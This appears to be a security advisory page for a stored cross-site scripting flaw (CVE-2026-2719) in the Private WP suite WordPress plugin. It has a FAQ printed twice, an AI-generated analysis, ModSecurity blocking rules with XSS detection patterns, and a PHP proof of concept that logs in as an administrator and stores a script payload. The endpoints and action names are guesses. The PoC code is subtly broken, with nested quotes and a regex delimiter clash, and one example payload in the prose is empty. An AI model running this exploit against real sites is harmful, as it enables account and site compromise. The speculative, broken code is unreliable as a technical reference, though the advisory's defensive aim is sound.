What is CVE-2026-2719?

CVE-2026-2719 is a Stored Cross-Site Scripting (XSS) vulnerability found in the Private WP suite plugin for WordPress, affecting versions up to and including 0.4.1. It allows authenticated users with Administrator-level access to inject arbitrary scripts via the ‘Exceptions’ setting.

How does the vulnerability work?

The vulnerability arises from insufficient input sanitization and output escaping in the ‘Exceptions’ setting. An attacker can input malicious scripts that are stored in the database and executed when other users access the affected pages.

Who is affected by this vulnerability?

This vulnerability affects WordPress installations using the Private WP suite plugin version 0.4.1 or earlier, specifically in multi-site setups or where unfiltered_html is disabled for administrators.

How can I check if my site is vulnerable?

To check if your site is vulnerable, verify if you are using the Private WP suite plugin version 0.4.1 or earlier. Additionally, assess if your installation is a multi-site setup or has unfiltered_html disabled for administrators.

What are the practical implications of a CVSS score of 4.4?

A CVSS score of 4.4 indicates a medium severity vulnerability. While it requires authenticated access to exploit, it can still lead to significant risks such as session hijacking and data theft if successfully executed.

How can I fix or mitigate this vulnerability?

To mitigate this vulnerability, update the Private WP suite plugin to the latest version that addresses the issue. Additionally, ensure proper input sanitization and output escaping are implemented in the plugin’s code.

What is the significance of insufficient input sanitization?

Insufficient input sanitization allows attackers to submit malicious scripts that are not properly filtered before being stored. This means that harmful code can persist in the database and execute when accessed by users.

What is a proof of concept (PoC) in this context?

The proof of concept provided illustrates how an attacker can exploit the vulnerability by logging in as an administrator and injecting a script through the ‘Exceptions’ setting. It serves as a practical example of how the vulnerability can be exploited.

What should I do if I cannot update the plugin immediately?

If immediate updates are not possible, consider disabling the Private WP suite plugin until a fix is applied. Additionally, review user access levels and restrict Administrator access to trusted users only.

How does this vulnerability affect multi-site installations?

In multi-site installations, the vulnerability can affect all sites under the network if an attacker gains access to the ‘Exceptions’ setting. This increases the potential impact, as malicious scripts can be executed across multiple sites.

What are the long-term implications of this vulnerability?

If left unaddressed, this vulnerability could lead to persistent security issues, including data breaches and unauthorized access to sensitive information. It is crucial to maintain regular updates and security audits to mitigate such risks.

Are there any additional security measures I should consider?

In addition to addressing this specific vulnerability, consider implementing security best practices such as using strong passwords, enabling two-factor authentication, and regularly reviewing user permissions to enhance your site’s overall security.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : April 23, 2026

CVE-2026-2719: Private WP suite <= 0.4.1 – Authenticated (Administrator+) Stored Cross-Site Scripting via 'Exceptions' Setting (private-wp-suite)

CVE ID CVE-2026-2719

Plugin private-wp-suite

Severity Medium (CVSS 4.4)

CWE 79

Vulnerable Version 0.4.1

Patched Version —

Disclosed April 20, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-2719 (metadata-based): This vulnerability is a Stored Cross-Site Scripting (XSS) issue in the WordPress plugin Private WP suite, affecting versions up to and including 0.4.1. An authenticated attacker with Administrator-level access can inject arbitrary web scripts through the ‘Exceptions’ setting. The vulnerability is limited to multi-site installations and environments where unfiltered_html has been disabled.

The root cause is insufficient input sanitization and output escaping on the ‘Exceptions’ setting, as described in the CWE-79 classification. Atomic Edge analysis infers that the plugin likely saves the ‘Exceptions’ field directly into the database without proper sanitization (e.g., missing use of wp_kses or sanitize_textarea_field) and then outputs it on admin pages or front-end pages without escaping (e.g., missing esc_html or esc_attr). This allows HTML and JavaScript payloads to persist. The description explicitly states insufficient sanitization and escaping, confirming this inference.

To exploit this, an attacker must have Administrator-level access or higher. On a WordPress multi-site installation with unfiltered_html disabled for administrators (a common configuration to enforce security), the attacker navigates to the plugin settings page (likely under Settings or a custom menu added by the plugin, at /wp-admin/options-general.php?page=private-wp-suite or similar). The attacker then locates the ‘Exceptions’ setting field and inputs an XSS payload such as alert(‘XSS’) or . The payload is saved via a form POST to the plugin’s admin action handler (likely an AJAX or admin-post hook, e.g., action=private_wp_suite_save_exceptions). The payload then executes whenever any user, including lower-privileged users, views the page that displays the Exceptions list.

A proper fix would require the plugin developers to sanitize the ‘Exceptions’ setting input using WordPress functions like sanitize_textarea_field or wp_kses_post, and escape the output in all contexts using esc_html, esc_attr, or wp_kses when rendering the setting on admin or front-end pages. The plugin should also validate that the current user has the necessary capabilities (e.g., manage_options) and enforce proper nonce verification to prevent CSRF.

The impact is significant in the restricted environment described. An attacker can inject persistent JavaScript that executes in the browsers of other administrators or users viewing the Exceptions page. This can lead to session hijacking, sensitive data theft (e.g., admin credentials, authentication tokens), defacement, or further privilege escalation via admin-level actions performed on behalf of the victim.

ModSecurity Protection Against This CVE

Here you will find our ModSecurity compatible rule to protect against this particular CVE.

ModSecurity

# Atomic Edge WAF Rule - CVE-2026-2719 (metadata-based)
# Block stored XSS injection in the 'Exceptions' setting of Private WP suite
SecRule REQUEST_URI "@streq /wp-admin/admin-post.php" 
  "id:20262719,phase:2,deny,status:403,chain,msg:'CVE-2026-2719 - Private WP suite XSS via Exceptions setting',severity:'CRITICAL',tag:'CVE-2026-2719'"
  SecRule ARGS_POST:action "@streq private_wp_suite_save_exceptions" "chain"
    SecRule ARGS_POST:exceptions "@rx <script|<img|onerror|onload|onmouseover|javascript:" "t:lowercase,t:urlDecodeUni"

# Alternative rule if the endpoint is AJAX-based
SecRule REQUEST_URI "@streq /wp-admin/admin-ajax.php" 
  "id:20262720,phase:2,deny,status:403,chain,msg:'CVE-2026-2719 - Private WP suite XSS via Exceptions (AJAX)',severity:'CRITICAL',tag:'CVE-2026-2719'"
  SecRule ARGS_POST:action "@streq private_wp_suite_ajax_save_exceptions" "chain"
    SecRule ARGS_POST:exceptions "@rx <script|<img|onerror|onload|onmouseover|javascript:" "t:lowercase,t:urlDecodeUni"

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
<?php
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-2719 - Private WP suite <= 0.4.1 - Authenticated (Administrator+) Stored Cross-Site Scripting via 'Exceptions' Setting

// Configuration: Replace these with actual target and admin credentials
$target_url = 'http://example.com'; // Base URL of the WordPress installation
$admin_username = 'admin';
$admin_password = 'password';

// Step 1: Login as Administrator
$login_url = $target_url . '/wp-login.php';
$login_data = array(
    'log' => $admin_username,
    'pwd' => $admin_password,
    'rememberme' => 'forever',
    'wp-submit' => 'Log In'
);

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $login_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($login_data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HEADER, true);
curl_setopt($ch, CURLOPT_COOKIEJAR, '/tmp/cookies.txt');
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, false);
$response = curl_exec($ch);
curl_close($ch);

// Step 2: Extract the settings page URL and nonce (assumed pattern)
// The plugin likely adds a settings page under Settings menu or a custom top-level menu.
// We assume the page is accessible at /wp-admin/options-general.php?page=private-wp-suite
// or /wp-admin/admin.php?page=private-wp-suite-settings
// For this PoC, we attempt to fetch the settings page to extract nonce.
// If nonce extraction fails, we assume direct POST without nonce (unlikely but possible).

$settings_page_url = $target_url . '/wp-admin/options-general.php?page=private-wp-suite';
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $settings_page_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEFILE, '/tmp/cookies.txt');
curl_setopt($ch, CURLOPT_HEADER, false);
$settings_html = curl_exec($ch);
curl_close($ch);

// Attempt to extract nonce from the page (common pattern: name="_wpnonce" value="...")
preg_match('/<input[^>]*name="_wpnonce"[^>]*value="([^"]+)"[^>]*/?>/i', $settings_html, $nonce_match);
preg_match('/<input[^>]*name="_wpnonce"[^>]*value="([^"]+)"[^>]*/?>/i', $settings_html, $nonce_match_alt);
$nonce = '';
if (isset($nonce_match[1])) {
    $nonce = $nonce_match[1];
} elseif (isset($nonce_match_alt[1])) {
    $nonce = $nonce_match_alt[1];
} else {
    // If no nonce found, proceed anyway (the plugin might not use one)
}

// XSS Payload
$xss_payload = '<script>alert('XSS by Atomic Edge');</script>';

// Step 3: Send the POST request to save the Exceptions setting
// Assumed action endpoint: /wp-admin/admin-post.php?action=private_wp_suite_save_exceptions
// or via AJAX: /wp-admin/admin-ajax.php?action=private_wp_suite_ajax_save
// We attempt the admin-post action first.
$save_url = $target_url . '/wp-admin/admin-post.php';
$post_data = array(
    'action' => 'private_wp_suite_save_exceptions',
    'exceptions' => $xss_payload,
    '_wpnonce' => $nonce
);

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $save_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEFILE, '/tmp/cookies.txt');
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, false);
$save_response = curl_exec($ch);
curl_close($ch);

// Check if the save succeeded (200 response, no error)
if (strpos($save_response, 'error') === false && strpos($save_response, 'Sorry') === false) {
    echo '[+] Exploit likely successful. The XSS payload was saved to the Exceptions setting.' . PHP_EOL;
    echo '[+] Payload: ' . $xss_payload . PHP_EOL;
    echo '[+] The payload will execute when any user views the Exceptions page.' . PHP_EOL;
} else {
    echo '[!] Exploit may have failed. Check target URL, credentials, or try manually.' . PHP_EOL;
}

// Clean up
unlink('/tmp/cookies.txt');

Frequently Asked Questions

What is CVE-2026-2719?
Overview of the vulnerability
CVE-2026-2719 is a Stored Cross-Site Scripting (XSS) vulnerability found in the Private WP suite plugin for WordPress, affecting versions up to and including 0.4.1. It allows authenticated users with Administrator-level access to inject arbitrary scripts via the ‘Exceptions’ setting.
How does the vulnerability work?
Mechanism of the exploit
The vulnerability arises from insufficient input sanitization and output escaping in the ‘Exceptions’ setting. An attacker can input malicious scripts that are stored in the database and executed when other users access the affected pages.
Who is affected by this vulnerability?
Identifying at-risk users
This vulnerability affects WordPress installations using the Private WP suite plugin version 0.4.1 or earlier, specifically in multi-site setups or where unfiltered_html is disabled for administrators.
How can I check if my site is vulnerable?
Identifying vulnerable installations
To check if your site is vulnerable, verify if you are using the Private WP suite plugin version 0.4.1 or earlier. Additionally, assess if your installation is a multi-site setup or has unfiltered_html disabled for administrators.
What are the practical implications of a CVSS score of 4.4?
Understanding the risk level
A CVSS score of 4.4 indicates a medium severity vulnerability. While it requires authenticated access to exploit, it can still lead to significant risks such as session hijacking and data theft if successfully executed.
How can I fix or mitigate this vulnerability?
Recommended actions
To mitigate this vulnerability, update the Private WP suite plugin to the latest version that addresses the issue. Additionally, ensure proper input sanitization and output escaping are implemented in the plugin’s code.
What is the significance of insufficient input sanitization?
Understanding the root cause
Insufficient input sanitization allows attackers to submit malicious scripts that are not properly filtered before being stored. This means that harmful code can persist in the database and execute when accessed by users.
What is a proof of concept (PoC) in this context?
Demonstrating the vulnerability
The proof of concept provided illustrates how an attacker can exploit the vulnerability by logging in as an administrator and injecting a script through the ‘Exceptions’ setting. It serves as a practical example of how the vulnerability can be exploited.
What should I do if I cannot update the plugin immediately?
Temporary mitigation strategies
If immediate updates are not possible, consider disabling the Private WP suite plugin until a fix is applied. Additionally, review user access levels and restrict Administrator access to trusted users only.
How does this vulnerability affect multi-site installations?
Specific risks for multi-site setups
In multi-site installations, the vulnerability can affect all sites under the network if an attacker gains access to the ‘Exceptions’ setting. This increases the potential impact, as malicious scripts can be executed across multiple sites.
What are the long-term implications of this vulnerability?
Potential future risks
If left unaddressed, this vulnerability could lead to persistent security issues, including data breaches and unauthorized access to sensitive information. It is crucial to maintain regular updates and security audits to mitigate such risks.
Are there any additional security measures I should consider?
Enhancing overall security
In addition to addressing this specific vulnerability, consider implementing security best practices such as using strong passwords, enabling two-factor authentication, and regularly reviewing user permissions to enhance your site’s overall security.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations